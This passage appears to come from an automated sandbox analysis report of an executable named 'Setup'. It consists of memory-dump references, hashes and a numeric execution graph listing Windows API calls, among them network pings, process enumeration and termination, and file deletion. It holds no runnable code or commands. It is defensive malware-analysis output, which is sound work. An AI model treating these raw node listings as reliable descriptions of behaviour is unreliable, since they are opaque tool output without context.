                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                  • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                  • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                  • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                  • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                  Execution Graph

                                                                  Execution Coverage:3.3%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:3.5%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:53
                                                                  execution_graph 96470 62f4c0 96473 63a025 96470->96473 96472 62f4cc 96474 63a046 96473->96474 96479 63a0a3 96473->96479 96474->96479 96482 630340 96474->96482 96477 67806b 96477->96477 96478 63a0e7 96478->96472 96479->96478 96509 693fe1 81 API calls __wsopen_s 96479->96509 96480 63a077 96480->96478 96480->96479 96505 62bed9 96480->96505 96501 630376 messages 96482->96501 96483 6405b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96483->96501 96484 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96484->96501 96485 64014b 8 API calls 96485->96501 96486 67632b 96585 693fe1 81 API calls __wsopen_s 96486->96585 96488 631695 96494 62bed9 8 API calls 96488->96494 96499 63049d messages 96488->96499 96490 630aae messages 96583 693fe1 81 API calls __wsopen_s 96490->96583 96491 62bed9 8 API calls 96491->96501 96492 675cdb 96498 62bed9 8 API calls 96492->96498 96492->96499 96493 67625a 96584 693fe1 81 API calls __wsopen_s 96493->96584 96494->96499 96498->96499 96499->96480 96500 62bf73 8 API calls 96500->96501 96501->96483 96501->96484 96501->96485 96501->96486 96501->96488 96501->96490 96501->96491 96501->96492 96501->96493 96501->96499 96501->96500 96502 640413 29 API calls pre_c_initialization 96501->96502 96503 676115 96501->96503 96510 631990 96501->96510 96572 631e50 96501->96572 96502->96501 96582 693fe1 81 API calls __wsopen_s 96503->96582 96506 62beed 96505->96506 96508 62befc __fread_nolock 96505->96508 96507 64017b 8 API calls 96506->96507 96506->96508 96507->96508 96508->96479 96509->96477 96511 6319b6 96510->96511 96512 631a2e 96510->96512 96513 6319c3 96511->96513 96514 676b60 96511->96514 96515 676a4d 96512->96515 96524 631a3d 96512->96524 96525 676b84 96513->96525 96526 6319cd 96513->96526 96602 6a85db 207 API calls 2 library calls 96514->96602 96516 676b54 96515->96516 96517 676a58 96515->96517 96601 693fe1 81 API calls __wsopen_s 96516->96601 96600 63b35c 207 API calls 96517->96600 96520 676bb5 96527 676be2 96520->96527 96528 676bc0 96520->96528 96521 630340 207 API calls 96521->96524 96523 631b62 messages 96529 6319e0 messages 96523->96529 96540 631a23 messages 96523->96540 96548 62bed9 8 API calls 96523->96548 96524->96521 96524->96529 96531 676979 96524->96531 96537 676908 96524->96537 96539 631ba9 96524->96539 96541 631bb5 96524->96541 96558 631af4 96524->96558 96525->96520 96530 676b9c 96525->96530 96526->96529 96534 62bed9 8 API calls 96526->96534 96605 6a60e6 96527->96605 96604 6a85db 207 API calls 2 library calls 96528->96604 96529->96540 96545 676dd9 96529->96545 96678 6a808f 53 API calls __wsopen_s 96529->96678 96603 693fe1 81 API calls __wsopen_s 96530->96603 96599 693fe1 81 API calls __wsopen_s 96531->96599 96534->96529 96598 693fe1 81 API calls __wsopen_s 96537->96598 96539->96541 96597 693fe1 81 API calls __wsopen_s 96539->96597 96540->96501 96541->96501 96543 676c81 96676 691ad8 8 API calls 96543->96676 96546 676e0f 96545->96546 96703 6a81ce 65 API calls 96545->96703 96705 62b4c8 8 API calls 96546->96705 96548->96529 96549 676db7 96679 628ec0 96549->96679 96552 676ded 96556 628ec0 52 API calls 96552->96556 96555 676c08 96612 69148b 96555->96612 96567 676df5 _wcslen 96556->96567 96557 676c93 96677 62bd07 8 API calls 96557->96677 96558->96539 96586 631ca0 96558->96586 96560 67691d messages 96560->96523 96560->96531 96560->96540 96562 631b55 96562->96523 96562->96539 96564 676c9c 96571 69148b 8 API calls 96564->96571 96565 676dbf _wcslen 96565->96545 96702 62b4c8 8 API calls 96565->96702 96567->96546 96704 62b4c8 8 API calls 96567->96704 96571->96529 96578 631e6d messages 96572->96578 96573 632512 96579 631ff7 messages 96573->96579 97448 63be08 39 API calls 96573->97448 96576 677837 96576->96579 97447 64d2d5 39 API calls 96576->97447 96578->96573 96578->96576 96578->96579 96581 67766b 96578->96581 97446 63e322 8 API calls messages 96578->97446 96579->96501 97445 64d2d5 39 API calls 96581->97445 96582->96490 96583->96499 96584->96499 96585->96499 96587 631cb2 96586->96587 96589 631cbb 96587->96589 96721 63b7a2 8 API calls 96587->96721 96590 631d70 96589->96590 96706 64014b 96589->96706 96590->96562 96592 631dd9 96593 64014b 8 API calls 96592->96593 96594 631de2 96593->96594 96715 62b329 96594->96715 96597->96540 96598->96560 96599->96529 96600->96523 96601->96514 96602->96529 96603->96540 96604->96529 96606 6a6101 96605->96606 96611 676bed 96605->96611 96607 64017b 8 API calls 96606->96607 96610 6a6123 96607->96610 96608 64014b 8 API calls 96608->96610 96610->96608 96610->96611 96737 691400 8 API calls 96610->96737 96611->96543 96611->96555 96613 691499 96612->96613 96615 676c32 96612->96615 96614 64014b 8 API calls 96613->96614 96613->96615 96614->96615 96616 632b20 96615->96616 96617 632fc0 96616->96617 96618 632b86 96616->96618 96937 6405b2 5 API calls __Init_thread_wait 96617->96937 96620 632ba0 96618->96620 96621 677bd8 96618->96621 96738 633160 96620->96738 96900 6a7af9 96621->96900 96623 632fca 96628 62b329 8 API calls 96623->96628 96633 63300b 96623->96633 96625 677be4 96625->96529 96627 633160 9 API calls 96629 632bc6 96627->96629 96636 632fe4 96628->96636 96630 632bfc 96629->96630 96629->96633 96632 677bfd 96630->96632 96656 632c18 __fread_nolock 96630->96656 96631 677bed 96631->96529 96942 693fe1 81 API calls __wsopen_s 96632->96942 96633->96631 96939 62b4c8 8 API calls 96633->96939 96938 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96636->96938 96637 633049 96940 63e6e8 207 API calls 96637->96940 96640 677c15 96943 693fe1 81 API calls __wsopen_s 96640->96943 96642 632d3f 96643 677c78 96642->96643 96644 632d4c 96642->96644 96945 6a61a2 53 API calls _wcslen 96643->96945 96646 633160 9 API calls 96644->96646 96647 632d59 96646->96647 96650 677da1 96647->96650 96652 633160 9 API calls 96647->96652 96648 64014b 8 API calls 96648->96656 96649 64017b 8 API calls 96649->96656 96661 677c10 96650->96661 96946 693fe1 81 API calls __wsopen_s 96650->96946 96651 633082 96941 63fe39 8 API calls 96651->96941 96657 632d73 96652->96657 96655 630340 207 API calls 96655->96656 96656->96637 96656->96640 96656->96642 96656->96648 96656->96649 96656->96655 96658 677c59 96656->96658 96656->96661 96657->96650 96660 62bed9 8 API calls 96657->96660 96663 632dd7 messages 96657->96663 96944 693fe1 81 API calls __wsopen_s 96658->96944 96660->96663 96661->96529 96662 633160 9 API calls 96662->96663 96663->96650 96663->96651 96663->96661 96663->96662 96666 632e8b messages 96663->96666 96748 6a9fe8 96663->96748 96751 6a9ffc 96663->96751 96754 69664c 96663->96754 96761 628bda 96663->96761 96836 6aa5b2 96663->96836 96842 63ac3e 96663->96842 96861 6aad47 96663->96861 96866 6a0fb8 96663->96866 96891 69f94a 96663->96891 96664 632f2d 96664->96529 96666->96664 96936 63e322 8 API calls messages 96666->96936 96676->96557 96677->96564 96678->96549 96680 628ed5 96679->96680 96696 628ed2 96679->96696 96681 628f0b 96680->96681 96682 628edd 96680->96682 96686 666a38 96681->96686 96687 628f1d 96681->96687 96692 666b1f 96681->96692 97441 645536 26 API calls 96682->97441 96684 628eed 96691 64014b 8 API calls 96684->96691 96695 64017b 8 API calls 96686->96695 96697 666ab1 96686->96697 97442 63fe6f 51 API calls 96687->97442 96689 666b37 96689->96689 96693 628ef7 96691->96693 97444 6454f3 26 API calls 96692->97444 96694 62b329 8 API calls 96693->96694 96694->96696 96699 666a81 96695->96699 96696->96565 97443 63fe6f 51 API calls 96697->97443 96698 64014b 8 API calls 96700 666aa8 96698->96700 96699->96698 96701 62b329 8 API calls 96700->96701 96701->96697 96702->96545 96703->96552 96704->96546 96705->96540 96707 640150 ___std_exception_copy 96706->96707 96708 64016a 96707->96708 96711 64016c 96707->96711 96722 64521d 7 API calls 2 library calls 96707->96722 96708->96592 96710 6409dd 96724 643614 RaiseException 96710->96724 96711->96710 96723 643614 RaiseException 96711->96723 96714 6409fa 96714->96592 96716 62b338 _wcslen 96715->96716 96725 64017b 96716->96725 96718 62b360 __fread_nolock 96719 64014b 8 API calls 96718->96719 96720 62b376 96719->96720 96720->96562 96721->96589 96722->96707 96723->96710 96724->96714 96726 64014b ___std_exception_copy 96725->96726 96727 64016a 96726->96727 96730 64016c 96726->96730 96734 64521d 7 API calls 2 library calls 96726->96734 96727->96718 96729 6409dd 96736 643614 RaiseException 96729->96736 96730->96729 96735 643614 RaiseException 96730->96735 96733 6409fa 96733->96718 96734->96726 96735->96729 96736->96733 96737->96610 96739 6331a1 96738->96739 96743 63317d 96738->96743 96947 6405b2 5 API calls __Init_thread_wait 96739->96947 96741 6331ab 96741->96743 96948 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96741->96948 96747 632bb0 96743->96747 96949 6405b2 5 API calls __Init_thread_wait 96743->96949 96744 639f47 96744->96747 96950 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96744->96950 96747->96627 96951 6a89b6 96748->96951 96750 6a9ff8 96750->96663 96752 6a89b6 119 API calls 96751->96752 96753 6aa00c 96752->96753 96753->96663 96755 628ec0 52 API calls 96754->96755 96756 696662 96755->96756 97103 68dc54 96756->97103 96758 69666a 96759 69666e GetLastError 96758->96759 96760 696683 96758->96760 96759->96760 96760->96663 96762 628ec0 52 API calls 96761->96762 96763 628bf9 96762->96763 96764 628ec0 52 API calls 96763->96764 96765 628c0e 96764->96765 96766 628ec0 52 API calls 96765->96766 96767 628c21 96766->96767 96768 628ec0 52 API calls 96767->96768 96769 628c37 96768->96769 97254 627ad5 96769->97254 96772 666767 96775 627e12 8 API calls 96772->96775 96774 628c72 96774->96772 96776 628c98 try_get_first_available_module 96774->96776 96777 666786 96775->96777 96783 628ec0 52 API calls 96776->96783 96811 628d3c 96776->96811 96830 628d91 try_get_first_available_module 96776->96830 96778 628470 8 API calls 96777->96778 96779 666798 96778->96779 96781 628a60 8 API calls 96779->96781 96809 6667bd 96779->96809 96780 627e12 8 API calls 96782 628d4e 96780->96782 96781->96809 96784 666873 96782->96784 96785 628d5c 96782->96785 96787 628d27 96783->96787 96791 6668bc 96784->96791 96792 66687d 96784->96792 96789 628d71 96785->96789 96790 66696e 96785->96790 96788 628ec0 52 API calls 96787->96788 96788->96811 96794 628470 8 API calls 96789->96794 96796 628470 8 API calls 96790->96796 96793 628470 8 API calls 96791->96793 96797 628470 8 API calls 96792->96797 96798 6668c5 96793->96798 96799 628d79 96794->96799 96795 62893c 8 API calls 96795->96809 96800 66697b 96796->96800 96801 666885 96797->96801 96802 628a60 8 API calls 96798->96802 96803 62bd57 8 API calls 96799->96803 96805 628a60 8 API calls 96800->96805 96806 628ec0 52 API calls 96801->96806 96808 6668e1 96802->96808 96803->96830 96804 628a60 8 API calls 96804->96809 96805->96830 96807 666897 96806->96807 97280 628844 8 API calls __fread_nolock 96807->97280 96815 628ec0 52 API calls 96808->96815 96809->96795 96809->96804 96834 628e71 96809->96834 97279 628844 8 API calls __fread_nolock 96809->97279 96811->96780 96812 6668ab 96814 62893c 8 API calls 96812->96814 96816 6668b9 96814->96816 96818 6668fc 96815->96818 96822 628a60 8 API calls 96816->96822 97281 628844 8 API calls __fread_nolock 96818->97281 96819 6669f1 96825 62893c 8 API calls 96819->96825 96820 6669c1 96820->96819 96823 6669e5 96820->96823 96822->96834 97282 62ad40 8 API calls __fread_nolock 96823->97282 96829 6669ff 96825->96829 96826 666910 96827 62893c 8 API calls 96826->96827 96827->96816 96832 628a60 8 API calls 96829->96832 96830->96820 96830->96834 97264 628844 8 API calls __fread_nolock 96830->97264 97265 62893c 96830->97265 97268 628a60 96830->97268 96831 6669ef 96833 666a12 96832->96833 96835 62bd57 8 API calls 96833->96835 96834->96663 96835->96831 96838 6aa5c5 96836->96838 96837 628ec0 52 API calls 96839 6aa632 96837->96839 96838->96837 96841 6aa5d4 96838->96841 97286 6918a9 96839->97286 96841->96663 96843 628ec0 52 API calls 96842->96843 96844 63ac68 96843->96844 97327 63bc58 96844->97327 96846 63ac7f 96847 62c98d 39 API calls 96846->96847 96852 63b09b _wcslen 96846->96852 96847->96852 96848 63bbbe 43 API calls 96848->96852 96850 627ad5 8 API calls 96850->96852 96851 626c03 8 API calls 96851->96852 96852->96848 96852->96850 96852->96851 96853 63b1fb 96852->96853 96856 628ec0 52 API calls 96852->96856 96857 62c98d 39 API calls 96852->96857 96858 628577 8 API calls 96852->96858 97332 62396b 96852->97332 97342 623907 96852->97342 97346 644d98 96852->97346 97356 62ad40 8 API calls __fread_nolock 96852->97356 97357 627b1a 8 API calls 96852->97357 96853->96663 96856->96852 96857->96852 96858->96852 96862 628ec0 52 API calls 96861->96862 96863 6aad63 96862->96863 97398 68dd87 CreateToolhelp32Snapshot Process32FirstW 96863->97398 96865 6aad72 96865->96663 96867 6a0fe1 96866->96867 96868 6a100f WSAStartup 96867->96868 96869 62c98d 39 API calls 96867->96869 96870 6a1054 96868->96870 96890 6a1023 messages 96868->96890 96872 6a0ffc 96869->96872 97417 63c1f6 96870->97417 96872->96868 96875 62c98d 39 API calls 96872->96875 96874 628ec0 52 API calls 96876 6a1069 96874->96876 96877 6a100b 96875->96877 97422 63f9d4 WideCharToMultiByte 96876->97422 96877->96868 96879 6a1075 inet_addr gethostbyname 96880 6a1093 IcmpCreateFile 96879->96880 96879->96890 96881 6a10d3 96880->96881 96880->96890 96882 64017b 8 API calls 96881->96882 96883 6a10ec 96882->96883 97430 62423c 96883->97430 96886 6a112b IcmpSendEcho 96888 6a114c 96886->96888 96887 6a1102 IcmpSendEcho 96887->96888 96889 6a1212 IcmpCloseHandle WSACleanup 96888->96889 96889->96890 96890->96663 96892 64017b 8 API calls 96891->96892 96893 69f95b 96892->96893 96894 62423c 8 API calls 96893->96894 96895 69f965 96894->96895 96896 628ec0 52 API calls 96895->96896 96897 69f97c GetEnvironmentVariableW 96896->96897 97435 69160f 8 API calls 96897->97435 96899 69f999 messages 96899->96663 96901 6a7b38 96900->96901 96902 6a7b52 96900->96902 97436 693fe1 81 API calls __wsopen_s 96901->97436 96904 6a60e6 8 API calls 96902->96904 96905 6a7b5d 96904->96905 96906 630340 206 API calls 96905->96906 96907 6a7bc1 96906->96907 96908 6a7c5c 96907->96908 96909 6a7c03 96907->96909 96910 6a7b4a 96907->96910 96911 6a7c62 96908->96911 96912 6a7cb0 96908->96912 96917 69148b 8 API calls 96909->96917 96910->96625 97437 691ad8 8 API calls 96911->97437 96912->96910 96913 628ec0 52 API calls 96912->96913 96915 6a7cc2 96913->96915 96918 62c2c9 8 API calls 96915->96918 96916 6a7c85 97438 62bd07 8 API calls 96916->97438 96920 6a7c3b 96917->96920 96921 6a7ce6 CharUpperBuffW 96918->96921 96922 632b20 206 API calls 96920->96922 96923 6a7d00 96921->96923 96922->96910 96924 6a7d53 96923->96924 96925 6a7d07 96923->96925 96926 628ec0 52 API calls 96924->96926 96928 69148b 8 API calls 96925->96928 96927 6a7d5b 96926->96927 97439 63aa65 9 API calls 96927->97439 96930 6a7d35 96928->96930 96931 632b20 206 API calls 96930->96931 96931->96910 96932 6a7d65 96932->96910 96933 628ec0 52 API calls 96932->96933 96934 6a7d80 96933->96934 97440 62bd07 8 API calls 96934->97440 96936->96666 96937->96623 96938->96633 96939->96637 96940->96651 96941->96651 96942->96661 96943->96661 96944->96661 96945->96657 96946->96661 96947->96741 96948->96743 96949->96744 96950->96747 96952 628ec0 52 API calls 96951->96952 96953 6a89ed 96952->96953 96975 6a8a32 messages 96953->96975 96989 6a9730 96953->96989 96955 6a8cde 96956 6a8eac 96955->96956 96960 6a8cec 96955->96960 97047 6a9941 59 API calls 96956->97047 96959 6a8ebb 96959->96960 96961 6a8ec7 96959->96961 97002 6a88e3 96960->97002 96961->96975 96962 628ec0 52 API calls 96980 6a8aa6 96962->96980 96967 6a8d25 97016 63ffe0 96967->97016 96970 6a8d5f 97021 627e12 96970->97021 96971 6a8d45 97045 693fe1 81 API calls __wsopen_s 96971->97045 96974 6a8d50 GetCurrentProcess TerminateProcess 96974->96970 96975->96750 96979 631ca0 8 API calls 96982 6a8d9e 96979->96982 96980->96955 96980->96962 96980->96975 97043 684ad3 8 API calls __fread_nolock 96980->97043 97044 6a8f7a 41 API calls _strftime 96980->97044 96981 6a8f22 96981->96975 96983 6a8f36 FreeLibrary 96981->96983 96984 6a95d8 74 API calls 96982->96984 96983->96975 96988 6a8daf 96984->96988 96985 631ca0 8 API calls 96985->96988 96988->96981 96988->96985 97032 6a95d8 96988->97032 97046 62b4c8 8 API calls 96988->97046 97048 62c2c9 96989->97048 96991 6a974b CharLowerBuffW 97054 689805 96991->97054 96998 6a979b 97078 62adf4 96998->97078 97000 6a98bb _wcslen 97000->96980 97001 6a97a5 _wcslen 97001->97000 97082 6a8f7a 41 API calls _strftime 97001->97082 97003 6a8949 97002->97003 97004 6a88fe 97002->97004 97008 6a9af3 97003->97008 97005 64017b 8 API calls 97004->97005 97006 6a8920 97005->97006 97006->97003 97007 64014b 8 API calls 97006->97007 97007->97006 97009 6a9d08 messages 97008->97009 97014 6a9b17 _strcat _wcslen ___std_exception_copy 97008->97014 97009->96967 97010 62c63f 39 API calls 97010->97014 97011 62c98d 39 API calls 97011->97014 97012 62ca5b 39 API calls 97012->97014 97013 628ec0 52 API calls 97013->97014 97014->97009 97014->97010 97014->97011 97014->97012 97014->97013 97086 68f8c5 10 API calls _wcslen 97014->97086 97018 63fff5 97016->97018 97017 64008d Sleep 97019 64005b 97017->97019 97018->97017 97018->97019 97020 64007b CloseHandle 97018->97020 97019->96970 97019->96971 97020->97019 97022 627e1a 97021->97022 97023 64014b 8 API calls 97022->97023 97024 627e28 97023->97024 97087 628445 97024->97087 97027 628470 97090 62c760 97027->97090 97029 628480 97030 64017b 8 API calls 97029->97030 97031 62851c 97029->97031 97030->97031 97031->96979 97031->96988 97033 6a95f0 97032->97033 97037 6a960c 97032->97037 97034 6a9618 97033->97034 97035 6a96c1 97033->97035 97036 6a95f7 97033->97036 97033->97037 97101 626c03 8 API calls 97034->97101 97102 69169e 72 API calls messages 97035->97102 97099 68f4e8 10 API calls _strlen 97036->97099 97037->96988 97041 6a9601 97100 626c03 8 API calls 97041->97100 97043->96980 97044->96980 97045->96974 97046->96988 97047->96959 97049 62c2dc 97048->97049 97053 62c2d9 __fread_nolock 97048->97053 97050 64014b 8 API calls 97049->97050 97051 62c2e7 97050->97051 97052 64017b 8 API calls 97051->97052 97052->97053 97053->96991 97055 689825 _wcslen 97054->97055 97056 689914 97055->97056 97059 68985a 97055->97059 97060 689919 97055->97060 97056->97001 97061 62bf73 97056->97061 97059->97056 97083 63e36b 41 API calls 97059->97083 97060->97056 97084 63e36b 41 API calls 97060->97084 97062 64017b 8 API calls 97061->97062 97063 62bf88 97062->97063 97064 64014b 8 API calls 97063->97064 97065 62bf96 97064->97065 97066 62acc0 97065->97066 97067 62accf 97066->97067 97070 62ace1 97066->97070 97068 62c2c9 8 API calls 97067->97068 97075 62acda __fread_nolock 97067->97075 97069 6705a3 __fread_nolock 97068->97069 97070->97067 97071 670557 97070->97071 97072 62ad07 97070->97072 97074 64014b 8 API calls 97071->97074 97085 6288e8 8 API calls 97072->97085 97076 670561 97074->97076 97075->96998 97077 64017b 8 API calls 97076->97077 97077->97067 97079 62ae02 97078->97079 97081 62ae0b __fread_nolock 97078->97081 97080 62c2c9 8 API calls 97079->97080 97079->97081 97080->97081 97081->97001 97082->97000 97083->97059 97084->97060 97085->97075 97086->97014 97088 64014b 8 API calls 97087->97088 97089 627e30 97088->97089 97089->97027 97091 62c76b 97090->97091 97092 671285 97091->97092 97097 62c773 messages 97091->97097 97094 64014b 8 API calls 97092->97094 97093 62c77a 97093->97029 97095 671291 97094->97095 97097->97093 97098 62c7e0 8 API calls messages 97097->97098 97098->97097 97099->97041 97100->97037 97101->97037 97102->97037 97104 62bf73 8 API calls 97103->97104 97105 68dc73 97104->97105 97106 62bf73 8 API calls 97105->97106 97107 68dc7c 97106->97107 97108 62bf73 8 API calls 97107->97108 97109 68dc85 97108->97109 97127 625851 97109->97127 97114 68dcab 97139 62568e 97114->97139 97115 626b7c 8 API calls 97115->97114 97117 68dcbf FindFirstFileW 97118 68dd4b FindClose 97117->97118 97121 68dcde 97117->97121 97122 68dd56 97118->97122 97119 68dd26 FindNextFileW 97119->97121 97120 62bed9 8 API calls 97120->97121 97121->97118 97121->97119 97121->97120 97181 627bb5 97121->97181 97190 626b7c 97121->97190 97122->96758 97126 68dd42 FindClose 97126->97122 97199 6622d0 97127->97199 97130 625898 97217 62bd57 97130->97217 97131 62587d 97205 628577 97131->97205 97134 625889 97201 6255dc 97134->97201 97137 68eab0 GetFileAttributesW 97138 68dc99 97137->97138 97138->97114 97138->97115 97140 62bf73 8 API calls 97139->97140 97141 6256a4 97140->97141 97142 62bf73 8 API calls 97141->97142 97143 6256ac 97142->97143 97144 62bf73 8 API calls 97143->97144 97145 6256b4 97144->97145 97146 62bf73 8 API calls 97145->97146 97147 6256bc 97146->97147 97148 6256f0 97147->97148 97149 664da1 97147->97149 97150 62acc0 8 API calls 97148->97150 97151 62bed9 8 API calls 97149->97151 97153 6256fe 97150->97153 97152 664daa 97151->97152 97154 62bd57 8 API calls 97152->97154 97155 62adf4 8 API calls 97153->97155 97157 625733 97154->97157 97156 625708 97155->97156 97156->97157 97158 62acc0 8 API calls 97156->97158 97159 625778 97157->97159 97160 625754 97157->97160 97169 664dcc 97157->97169 97162 625729 97158->97162 97161 62acc0 8 API calls 97159->97161 97160->97159 97224 62655e 97160->97224 97163 625789 97161->97163 97164 62adf4 8 API calls 97162->97164 97166 62579f 97163->97166 97172 62bed9 8 API calls 97163->97172 97164->97157 97170 6257b3 97166->97170 97173 62bed9 8 API calls 97166->97173 97168 628577 8 API calls 97176 664e8c 97168->97176 97169->97168 97171 6257be 97170->97171 97175 62bed9 8 API calls 97170->97175 97177 62bed9 8 API calls 97171->97177 97179 6257c9 97171->97179 97172->97166 97173->97170 97174 62acc0 8 API calls 97174->97159 97175->97171 97176->97159 97178 62655e 8 API calls 97176->97178 97227 62ad40 8 API calls __fread_nolock 97176->97227 97177->97179 97178->97176 97179->97117 97182 627bc7 97181->97182 97183 66641d 97181->97183 97228 627bd8 97182->97228 97238 6813c8 8 API calls __fread_nolock 97183->97238 97186 627bd3 97186->97121 97187 666427 97188 666433 97187->97188 97189 62bed9 8 API calls 97187->97189 97189->97188 97191 626b93 97190->97191 97192 6657fe 97190->97192 97244 626ba4 97191->97244 97194 64014b 8 API calls 97192->97194 97196 665808 _wcslen 97194->97196 97195 626b9e DeleteFileW 97195->97119 97195->97126 97197 64017b 8 API calls 97196->97197 97198 665841 __fread_nolock 97197->97198 97200 62585e GetFullPathNameW 97199->97200 97200->97130 97200->97131 97202 6255ea 97201->97202 97203 62adf4 8 API calls 97202->97203 97204 6255fe 97203->97204 97204->97137 97206 666610 97205->97206 97207 628587 _wcslen 97205->97207 97208 62adf4 8 API calls 97206->97208 97210 6285c2 97207->97210 97211 62859d 97207->97211 97209 666619 97208->97209 97209->97209 97213 64014b 8 API calls 97210->97213 97223 6288e8 8 API calls 97211->97223 97214 6285ce 97213->97214 97216 64017b 8 API calls 97214->97216 97215 6285a5 __fread_nolock 97215->97134 97216->97215 97218 62bd71 97217->97218 97219 62bd64 97217->97219 97220 64014b 8 API calls 97218->97220 97219->97134 97221 62bd7b 97220->97221 97222 64017b 8 API calls 97221->97222 97222->97219 97223->97215 97225 62c2c9 8 API calls 97224->97225 97226 625761 97225->97226 97226->97159 97226->97174 97227->97176 97229 627be7 97228->97229 97235 627c1b __fread_nolock 97228->97235 97230 66644e 97229->97230 97231 627c0e 97229->97231 97229->97235 97233 64014b 8 API calls 97230->97233 97239 627d74 97231->97239 97234 66645d 97233->97234 97236 64017b 8 API calls 97234->97236 97235->97186 97237 666491 __fread_nolock 97236->97237 97238->97187 97240 627d8a 97239->97240 97242 627d85 __fread_nolock 97239->97242 97241 64017b 8 API calls 97240->97241 97243 666528 97240->97243 97241->97242 97242->97235 97243->97243 97245 626bb4 _wcslen 97244->97245 97246 626bc7 97245->97246 97247 665860 97245->97247 97248 627d74 8 API calls 97246->97248 97249 64014b 8 API calls 97247->97249 97250 626bd4 __fread_nolock 97248->97250 97251 66586a 97249->97251 97250->97195 97252 64017b 8 API calls 97251->97252 97253 66589a __fread_nolock 97252->97253 97255 64017b 8 API calls 97254->97255 97256 627afa 97255->97256 97257 64014b 8 API calls 97256->97257 97258 627b08 97257->97258 97258->96772 97259 62c98d 97258->97259 97260 62c99e 97259->97260 97261 62c9a5 97259->97261 97260->97261 97283 646641 39 API calls _strftime 97260->97283 97261->96774 97263 62c9e8 97263->96774 97264->96830 97266 64014b 8 API calls 97265->97266 97267 62894a 97266->97267 97267->96830 97269 628a76 97268->97269 97270 666737 97269->97270 97276 628a80 97269->97276 97284 63b7a2 8 API calls 97270->97284 97271 666744 97285 62b4c8 8 API calls 97271->97285 97274 666762 97274->97274 97275 628b94 97277 64014b 8 API calls 97275->97277 97276->97271 97276->97275 97278 628b9b 97276->97278 97277->97278 97278->96830 97279->96809 97280->96812 97281->96826 97282->96831 97283->97263 97284->97271 97285->97274 97287 6918b6 97286->97287 97288 64014b 8 API calls 97287->97288 97289 6918bd 97288->97289 97292 68fcb5 97289->97292 97291 6918f7 97291->96841 97293 62c2c9 8 API calls 97292->97293 97294 68fcc8 CharLowerBuffW 97293->97294 97296 68fcdb 97294->97296 97295 68fd19 97297 68fd2b 97295->97297 97299 62655e 8 API calls 97295->97299 97296->97295 97298 62655e 8 API calls 97296->97298 97309 68fce5 ___scrt_fastfail 97296->97309 97300 64017b 8 API calls 97297->97300 97298->97296 97299->97297 97304 68fd59 97300->97304 97303 68fdb8 97306 64014b 8 API calls 97303->97306 97303->97309 97305 68fd7b 97304->97305 97325 68fbed 8 API calls 97304->97325 97310 68fe0c 97305->97310 97307 68fdd2 97306->97307 97308 64017b 8 API calls 97307->97308 97308->97309 97309->97291 97311 62bf73 8 API calls 97310->97311 97312 68fe3e 97311->97312 97313 62bf73 8 API calls 97312->97313 97314 68fe47 97313->97314 97315 62bf73 8 API calls 97314->97315 97323 68fe50 97315->97323 97316 690114 97316->97303 97317 628577 8 API calls 97317->97323 97318 6466f8 GetStringTypeW 97318->97323 97319 62ad40 8 API calls 97319->97323 97321 646641 39 API calls 97321->97323 97322 68fe0c 40 API calls 97322->97323 97323->97316 97323->97317 97323->97318 97323->97319 97323->97321 97323->97322 97324 62bed9 8 API calls 97323->97324 97326 646722 GetStringTypeW _strftime 97323->97326 97324->97323 97325->97304 97326->97323 97328 64014b 8 API calls 97327->97328 97329 63bc65 97328->97329 97330 62b329 8 API calls 97329->97330 97331 63bc70 97330->97331 97331->96846 97333 623996 ___scrt_fastfail 97332->97333 97358 625f32 97333->97358 97336 623a1c 97338 623a3a Shell_NotifyIconW 97336->97338 97339 6640cd Shell_NotifyIconW 97336->97339 97362 6261a9 97338->97362 97341 623a50 97341->96852 97343 623969 97342->97343 97344 623919 ___scrt_fastfail 97342->97344 97343->96852 97345 623938 Shell_NotifyIconW 97344->97345 97345->97343 97347 644da6 97346->97347 97348 644e1b 97346->97348 97355 644dcb 97347->97355 97395 64f649 20 API calls __dosmaperr 97347->97395 97397 644e2d 40 API calls 4 library calls 97348->97397 97351 644e28 97351->96852 97352 644db2 97396 652b5c 26 API calls pre_c_initialization 97352->97396 97354 644dbd 97354->96852 97355->96852 